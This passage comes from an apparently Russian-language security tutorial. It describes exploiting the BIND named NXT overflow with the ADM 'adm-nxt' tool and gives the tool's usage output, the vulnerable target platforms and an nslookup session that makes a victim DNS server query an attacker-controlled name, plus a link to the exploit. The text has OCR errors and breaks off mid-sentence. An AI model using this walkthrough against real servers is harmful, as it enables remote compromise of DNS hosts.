Иллюстрированный самоучитель по Secure Web

         

о том, что сервер DNS,



subdomain  IN  NS hash.attaokers.org.

Помните о том, что сервер DNS, контролируемый взломщиком, запущен на узле quake.

После компиляции утилиты взлома, созданной группой ADM (http: //packet storm.securify.com/9911-exploits/adm-nxt.с), ее нужно запустить с отдельного узла (tsunami), имеющего корректную архитектуру. Поскольку программа named используется в многих версиях UNIX, то утилитой adm-nxt поддерживаются следующие архитектуры.

[tsunami]# adm-nxt

Usage: adm-nxt architecture [command]

Available architectures:

1: Linux Redhat 6.x - named 8.2/8.2.1 (from rpm)

2: Linux SolarDiz's non-exec
stack patch - named 8.2/8.2.1

3: Solaris 7 (Oxff) - named 8.2.1

4: Solaris 2.6 - named 8.2.1

5: FreeBSD 3.2-RELEASE - named 8.2

6: OpenBSD 2.5 - named 8.2

7: NetBSD 1.4.1 - named 8.2.1

После проведения предварительного сбора данных с использованием утилиты шпар стало известно, что на удаленном узле используется система Red Hat 6.x. Таким образом, для утилиты adm-nxt необходимо задать режим 1.

[tsunami]# adm-nxt 1

После запуска утилита adm-nxt свяжется с UDP-портом 53 узла tsunami и будет ожидать установки соединения с уязвимым сервером имен. На этом узле не нужно запускать реальный сервер DNS, в противном случае утилита adm-nxt не сможет связаться с портом 53. Не забывайте о том, что работа утилиты adm-nxt основывается на наличии целевого сервера имен, соединенного (или запрашивающего) с ложным сервером DNS, который на самом деле представляет собой утилиту взлома, прослушивающую UDP-порт 53. Как же взломщик может это реализовать? Очень просто. Для этого достаточно передать целевому серверу DNS запрос на получение некоторых данных с использованием команды nslookup.

[quake]# nslookup

Default Server:localhost.attackers.org

Address: 127.0.0.1

> server 10.1.1.100

Default Server: dns.victim.net

Address: 10.1.1.100 >

hash.attackers.org

Server: dns.victim.net

Address: 10.1.1.100

Как видно из приведенного листинга, взломщик запустил команду nslookup в интерактивном режиме на отдельном компьютере, находящемся в его полном распоряжении. Затем он перешел от использования сервера DNS, заданного по умолчанию, к

Содержание  Назад  Вперед